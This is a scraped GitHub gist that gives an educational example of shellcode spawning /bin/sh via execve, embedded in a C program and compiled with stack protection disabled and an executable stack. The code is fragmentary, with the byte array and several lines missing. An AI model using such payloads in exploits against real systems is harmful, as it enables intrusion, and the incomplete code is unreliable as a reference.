Skip to content

Instantly share code, notes, and snippets.

@mgeeky mgeeky/execve.c
Created Nov 17, 2016

What would you like to do?
Example of simple execve("/bin/sh", ...) shellcode, embedded in C program.
* Example of simple execve('/bin/sh', ...); shellcode compiled
* and embedded within C program, then compiled on 64-bit with NX bit
* turned off and set executable stack.
* Compilation:
* $ gcc -fno-stack-protector -z execstack execve1.c -o execve1c
; Compilation: nasm -f bin file.asm -o file.bin
global _start
jmp short calleip
pop rsi
xor rax, rax
mov byte [rsi + 7], al
lea rbx, [rsi]
mov qword [rsi + 8], rbx
mov qword [rsi + 16], rax
mov byte al, 0x0b ; execve
mov rbx, rsi
lea rcx, [rsi + 8]
lea rdx, [rsi + 16]
; execve('/bin/sh', { '/bin/sh', 0}, 0);
int 0x80
call shellcode
; Buffer containing parameters to be passed
; to execve(); At the 0 position it starts with
; /bin/sh path. Then at the position of 'A' will be
; null byte inserted effectively ending the string.
; Then the address of /bin/sh itself is going to be
; inserted in place of 'BBBBBBBBB' sequence and followed by
; 'CCCCCCCC' substituted by 00000000 qword value ending array.
char shellcode[64] =
int main()
int (*func)();
func = (int (*)())shellcode;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.